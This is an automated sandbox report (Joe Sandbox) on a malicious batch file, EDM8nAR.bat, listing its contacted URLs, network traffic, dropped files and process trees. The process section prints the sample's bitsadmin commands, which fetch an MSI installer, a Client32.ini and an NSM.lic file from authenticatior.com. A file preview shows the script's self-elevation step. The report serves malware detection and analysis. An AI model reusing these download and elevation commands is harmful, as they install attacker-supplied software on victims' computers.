      https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000004.00000003.839821770.000002A1D5640000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.drfalse
        high
        http://crl.ver)svchost.exe, 00000004.00000002.2103228272.000002A1D5811000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://authenticatior.com/vrep.msisvchost.exe, 00000004.00000002.2102733955.000002A1D0B13000.00000004.00000020.00020000.00000000.sdmp, EDM8nAR.bat, edb.log.4.drtrue
          • Avira URL Cloud: malware
          unknown
          https://authenticatior.com/Client32.iniLMEMPHbitsadmin.exe, 00000006.00000002.1635743396.00000204B19F7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://authenticatior.com/vrep.msiC:bitsadmin.exe, 00000003.00000002.1262147479.00000287664E7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://authenticatior.com/Client32.inibitsadmin.exe, 00000006.00000002.1635743396.00000204B19D0000.00000004.00000020.00020000.00000000.sdmp, EDM8nAR.bat, edb.log.4.drtrue
          • Avira URL Cloud: safe
          unknown
          https://authenticatior.com/NSM.lic6fb2bsvchost.exe, 00000004.00000002.2103422714.000002A1D58C3000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://authenticatior.com/NSM.licbitsadmin.exe, 0000000D.00000002.2007122246.0000020C5DDE0000.00000004.00000020.00020000.00000000.sdmp, EDM8nAR.bat, edb.log.4.drtrue
          • Avira URL Cloud: safe
          unknown
          https://authenticatior.com:443/NSM.licsvchost.exe, 00000004.00000002.2103350733.000002A1D588B000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          5.252.155.19
          authenticatior.comRussian Federation
          49981WORLDSTREAMNLtrue
          IP
          127.0.0.1
          Joe Sandbox version:42.0.0 Malachite
          Analysis ID:1632649
          Start date and time:2025-03-08 15:54:16 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 41s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:16
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:EDM8nAR.bat
          Detection:MAL
          Classification:mal60.evad.winBAT@11/5@1/2
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .bat
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 23.60.203.209, 52.149.20.212
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.f.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, c.pki.goog, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          TimeTypeDescription
          09:55:07API Interceptor2x Sleep call for process: svchost.exe modified
          No context
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          WORLDSTREAMNLcTgYsJEANZ.exeGet hashmaliciousUnknownBrowse
          • 185.183.32.103
          ChromeSetup.exeGet hashmaliciousUnknownBrowse
          • 185.18.52.66
          ChromeSetup.exeGet hashmaliciousUnknownBrowse
          • 185.18.52.85
          PluginRequirements.exeGet hashmaliciousUnknownBrowse
          • 185.18.52.85
          PluginRequirements.exeGet hashmaliciousUnknownBrowse
          • 185.18.52.85
          HmngBpR.exeGet hashmaliciousUnknownBrowse
          • 185.183.32.103
          mQRr8Rkorf.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
          • 185.183.32.103
          PluginRequirements.exeGet hashmaliciousUnknownBrowse
          • 185.18.52.66
          PluginRequirements.exeGet hashmaliciousUnknownBrowse
          • 185.18.52.66
          PluginRequirements.exeGet hashmaliciousUnknownBrowse
          • 185.18.52.85
          No context
          No context
          Process:C:\Windows\System32\svchost.exe
          File Type:data
          Category:dropped
          Size (bytes):1310720
          Entropy (8bit):0.763824381147111
          Encrypted:false
          SSDEEP:1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6VqZ:2JIB/wUKUKQncEmYRTwh0cqdIEd
          MD5:98D8C681CAF4A58FBB3FDCB35DAED47E
          SHA1:970BDD7A8A27CCBB860A053DFAF7F9CF4BFA0424
          SHA-256:8122422A6B472807ED7DEA611FE701FCDC36754C5364A520477A43763393AD92
          SHA-512:72EA9B07DE98F32C82CF3EE1F390D6EAA68E44E540F3B582A31107B7FE30369BA6D7613F392F8157A47F4F2D3B925EE31CBD12DC8858D9229E23223E71E67F77
          Malicious:false
          Reputation:low
          Preview:...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
          Process:C:\Windows\System32\svchost.exe
          File Type:Extensible storage engine DataBase, version 0x620, checksum 0x57fc2b67, page size 16384, DirtyShutdown, Windows version 10.0
          Category:dropped
          Size (bytes):1310720
          Entropy (8bit):0.7899748538397386
          Encrypted:false
          SSDEEP:1536:DSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:DazaPvgurTd42UgSii
          MD5:48F8539E2DCA0AC6A8E65C83048253EC
          SHA1:6CD7FA30C994A3246E4EB6F3E5411DF1DEDA11B9
          SHA-256:E14A84D309C16960CE32AA6A2116A75E933F50D7D364F69AE746B045F218E750
          SHA-512:1287330EA3FD0A137ED39D00748D2FE856F215633AA87B97522EBDF85C5759747E9A21B16FEA41FF989877D027AF9F2F563AB51FAA59E4B0AFAC92F0D73CE3BA
          Malicious:false
          Reputation:low
          Preview:W.+g... ...............X\...;...{......................0.`.....42...{5..7...}O.h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{..................................g.I..7...}m......................7...}m..........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\System32\svchost.exe
          File Type:data
          Category:dropped
          Size (bytes):16384
          Entropy (8bit):0.08168964029281205
          Encrypted:false
          SSDEEP:3:Jj/KYeVD9vNt/57Dek3JxoliDxlAllEqW3l/TjzzQ/t:B/KzVhvPR3tjlAmd8/
          MD5:01544143B6BD5655665D6A8197E40A67
          SHA1:3B378B4DB4803CB5A84AFC2D48CEA371C8CE970E
          SHA-256:5D24F411C6FFFDE65A886F8FD77A2B970AC1C835713F9781E6E100435F877CFC
          SHA-512:EC7D0EFA32B80EC789AA53A98675084595F5DE60B137D0EF2E648BAC98934B6C9E994DE576572959B5A88DFD37D2BCEDE4C5920093F6D60473051DB8B59128D3
          Malicious:false
          Reputation:low
          Preview:g.2......................................;...{...7...}m.42...{5.........42...{5.42...{5...Y.42...{59.....................7...}m.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\System32\svchost.exe
          File Type:JSON data
          Category:dropped
          Size (bytes):55
          Entropy (8bit):4.306461250274409
          Encrypted:false
          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
          MD5:DCA83F08D448911A14C22EBCACC5AD57
          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
          Malicious:false
          Reputation:high, very likely benign file
          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
          Process:C:\Windows\System32\fltMC.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):864
          Entropy (8bit):2.3851453072087065
          Encrypted:false
          SSDEEP:6:w0/2IOqZ7Q11aCVCACDSRw6EYNTWzveSG8Mm8zMhjTN8IM82/08yYN3QGN1En:wbI9ZwRcjOiw4jNG8nm6XNR3m2YNFE
          MD5:7772C0D883FB2F2E520537A884A95EE3
          SHA1:999D3F01E6EDF0C8F5B1D90BDDF93EEC7080890A
          SHA-256:3970F35A50088BB0B6E02F54B91C7786C85086D60AC7898CC152DC2F040EDBD2
          SHA-512:AEF61E75DBC2ECB7D6FDBC180B45CB7D30FF8D1230A7BED9836FE35A6F3C7AC4DF62DE4F1015BB1745CCEA7D41CBD0BD6D06010837BBB6B5EC770501667CB268
          Malicious:false
          Preview:..Filter Name Num Instances Altitude Frame..------------------------------ ------------- ------------ -----..bindflt 0 409800 0..wsuV5MB 7 387500 0..Filetrace 5 385000 0..storqosflt 0 244000 0..wcifs 0 189900 0..CldFlt 0 180451 0..FileCrypt 0 141100 0..luafv 1 135000 0..npsvctrig 1 46000 0..Wof 2 40700 0..FileInfo 5 40500 0..
          File type:DOS batch file, Unicode text, UTF-8 (with BOM) text
          Entropy (8bit):5.5980744629977
          TrID:
          • Text - UTF-8 encoded (3003/1) 100.00%
          File name:EDM8nAR.bat
          File size:1'300 bytes
          MD5:9e4466ae223671f3afda11c6c1e107d1
          SHA1:438b65cb77e77a41e48cdb16dc3dee191c2729c7
          SHA256:ab289a1dc9ad423e385c539a539feec8c04604d17656c663e52e02ceebd4409f
          SHA512:3f7be864e567e1906f9227fe4b8e47a9f16032d732aecfc7256e581939e3b810bc6e696c4a80be670624e5fd08c336d539e23ed825bd823614a2fcda3b21f2aa
          SSDEEP:24:Oh7MVsP49yA4C6OvUA4CpWA4C6ObaJY/lJtGVvgvXs0Uv5VU91vXCc3+1v+QzVvr:AMVHOXuq9XlYFxs0wVaR93C/d9J7
          TLSH:E621EE6B2A8A046769BCF0E1CB8C44C668ABC2ADEA55F1DE3055186A744E0254FDB0C3
          File Content Preview:...@echo off.:: .................., .............. .... ............ .. .............. .............................fltmc >nul 2>&1.if errorlevel 1 (. set "_batchPath=%~f0". echo Set UAC = CreateObject^("Shell.Application"^) > "%TEMP%\invis.vbs".
          Icon Hash:9686878b929a9886
          TimestampSource PortDest PortSource IPDest IP
          Mar 8, 2025 15:55:13.109494925 CET49684443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:13.109556913 CET443496845.252.155.19192.168.2.7
          Mar 8, 2025 15:55:13.109741926 CET49684443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:13.111573935 CET49684443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:13.111593008 CET443496845.252.155.19192.168.2.7
          Mar 8, 2025 15:55:16.798882961 CET443496845.252.155.19192.168.2.7
          Mar 8, 2025 15:55:16.800760031 CET49684443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:16.800853014 CET443496845.252.155.19192.168.2.7
          Mar 8, 2025 15:55:16.801002026 CET49684443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:16.801816940 CET49685443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:16.801884890 CET443496855.252.155.19192.168.2.7
          Mar 8, 2025 15:55:16.801961899 CET49685443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:16.802438974 CET49685443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:16.802449942 CET443496855.252.155.19192.168.2.7
          Mar 8, 2025 15:55:20.593617916 CET443496855.252.155.19192.168.2.7
          Mar 8, 2025 15:55:20.594140053 CET49685443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:20.594259977 CET443496855.252.155.19192.168.2.7
          Mar 8, 2025 15:55:20.594329119 CET49685443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:20.594573021 CET49686443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:20.594638109 CET443496865.252.155.19192.168.2.7
          Mar 8, 2025 15:55:20.594769001 CET49686443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:20.595870018 CET49686443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:20.595900059 CET443496865.252.155.19192.168.2.7
          Mar 8, 2025 15:55:20.595967054 CET49686443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:50.720175028 CET49694443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:50.720221996 CET443496945.252.155.19192.168.2.7
          Mar 8, 2025 15:55:50.720287085 CET49694443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:50.720776081 CET49694443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:50.720789909 CET443496945.252.155.19192.168.2.7
          Mar 8, 2025 15:55:54.228462934 CET443496945.252.155.19192.168.2.7
          Mar 8, 2025 15:55:54.229020119 CET49694443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:54.229120970 CET443496945.252.155.19192.168.2.7
          Mar 8, 2025 15:55:54.229183912 CET49694443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:54.229520082 CET49695443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:54.229573965 CET443496955.252.155.19192.168.2.7
          Mar 8, 2025 15:55:54.229798079 CET49695443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:54.230106115 CET49695443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:54.230118036 CET443496955.252.155.19192.168.2.7
          Mar 8, 2025 15:55:58.010912895 CET443496955.252.155.19192.168.2.7
          Mar 8, 2025 15:55:58.011579990 CET49695443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:58.011708021 CET443496955.252.155.19192.168.2.7
          Mar 8, 2025 15:55:58.011768103 CET49695443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:58.011889935 CET49696443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:58.011928082 CET443496965.252.155.19192.168.2.7
          Mar 8, 2025 15:55:58.011997938 CET49696443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:58.012336016 CET49696443192.168.2.75.252.155.19
          Mar 8, 2025 15:55:58.012357950 CET443496965.252.155.19192.168.2.7
          Mar 8, 2025 15:55:58.012401104 CET49696443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:28.052222013 CET49698443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:28.052303076 CET443496985.252.155.19192.168.2.7
          Mar 8, 2025 15:56:28.052418947 CET49698443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:28.052700043 CET49698443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:28.052732944 CET443496985.252.155.19192.168.2.7
          Mar 8, 2025 15:56:31.628161907 CET443496985.252.155.19192.168.2.7
          Mar 8, 2025 15:56:31.628622055 CET49698443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:31.628801107 CET443496985.252.155.19192.168.2.7
          Mar 8, 2025 15:56:31.628865957 CET49698443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:31.629218102 CET49699443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:31.629281044 CET443496995.252.155.19192.168.2.7
          Mar 8, 2025 15:56:31.629360914 CET49699443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:31.629658937 CET49699443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:31.629673004 CET443496995.252.155.19192.168.2.7
          Mar 8, 2025 15:56:35.136528015 CET443496995.252.155.19192.168.2.7
          Mar 8, 2025 15:56:35.136951923 CET49699443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:35.137105942 CET443496995.252.155.19192.168.2.7
          Mar 8, 2025 15:56:35.137157917 CET49699443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:35.137394905 CET49700443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:35.137447119 CET443497005.252.155.19192.168.2.7
          Mar 8, 2025 15:56:35.137510061 CET49700443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:35.137679100 CET49700443192.168.2.75.252.155.19
          Mar 8, 2025 15:56:35.137705088 CET443497005.252.155.19192.168.2.7
          Mar 8, 2025 15:56:35.137743950 CET49700443192.168.2.75.252.155.19
          TimestampSource PortDest PortSource IPDest IP
          Mar 8, 2025 15:55:13.094567060 CET5556553192.168.2.71.1.1.1
          Mar 8, 2025 15:55:13.108861923 CET53555651.1.1.1192.168.2.7
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Mar 8, 2025 15:55:13.094567060 CET192.168.2.71.1.1.10x3f2bStandard query (0)authenticatior.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Mar 8, 2025 15:55:13.108861923 CET1.1.1.1192.168.2.70x3f2bNo error (0)authenticatior.com5.252.155.19A (IP address)IN (0x0001)false

          Click to jump to process

          Click to jump to process

          Click to jump to process

          Target ID:0
          Start time:09:55:07
          Start date:08/03/2025
          Path:C:\Windows\System32\cmd.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\EDM8nAR.bat" "
          Imagebase:0x7ff70b6e0000
          File size:289'792 bytes
          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:1
          Start time:09:55:07
          Start date:08/03/2025
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff642da0000
          File size:862'208 bytes
          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:2
          Start time:09:55:07
          Start date:08/03/2025
          Path:C:\Windows\System32\fltMC.exe
          Wow64 process (32bit):false
          Commandline:fltmc
          Imagebase:0x7ff652c70000
          File size:31'232 bytes
          MD5 hash:6AB08CADCE7DF971A043DCD1257D7374
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          Target ID:3
          Start time:09:55:07
          Start date:08/03/2025
          Path:C:\Windows\System32\bitsadmin.exe
          Wow64 process (32bit):false
          Commandline:bitsadmin /transfer "DownloadVrep" https://authenticatior.com/vrep.msi "C:\Users\user~1\AppData\Local\Temp\vrep_install\vrep.msi"
          Imagebase:0x7ff7416c0000
          File size:211'456 bytes
          MD5 hash:01AAB62D5799F75B0D69EB29C1CA6855
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          Target ID:4
          Start time:09:55:07
          Start date:08/03/2025
          Path:C:\Windows\System32\svchost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Imagebase:0x7ff7c8b00000
          File size:55'320 bytes
          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:false

          Target ID:6
          Start time:09:55:50
          Start date:08/03/2025
          Path:C:\Windows\System32\bitsadmin.exe
          Wow64 process (32bit):false
          Commandline:bitsadmin /transfer "DownloadClient" https://authenticatior.com/Client32.ini "C:\Users\user~1\AppData\Local\Temp\vrep_install\Client32.ini"
          Imagebase:0x7ff7416c0000
          File size:211'456 bytes
          MD5 hash:01AAB62D5799F75B0D69EB29C1CA6855
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          Target ID:13
          Start time:09:56:27
          Start date:08/03/2025
          Path:C:\Windows\System32\bitsadmin.exe
          Wow64 process (32bit):false
          Commandline:bitsadmin /transfer "DownloadLicense" https://authenticatior.com/NSM.lic "C:\Users\user~1\AppData\Local\Temp\vrep_install\NSM.lic"
          Imagebase:0x7ff7416c0000
          File size:211'456 bytes
          MD5 hash:01AAB62D5799F75B0D69EB29C1CA6855
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:moderate
          Has exited:true

          No disassembly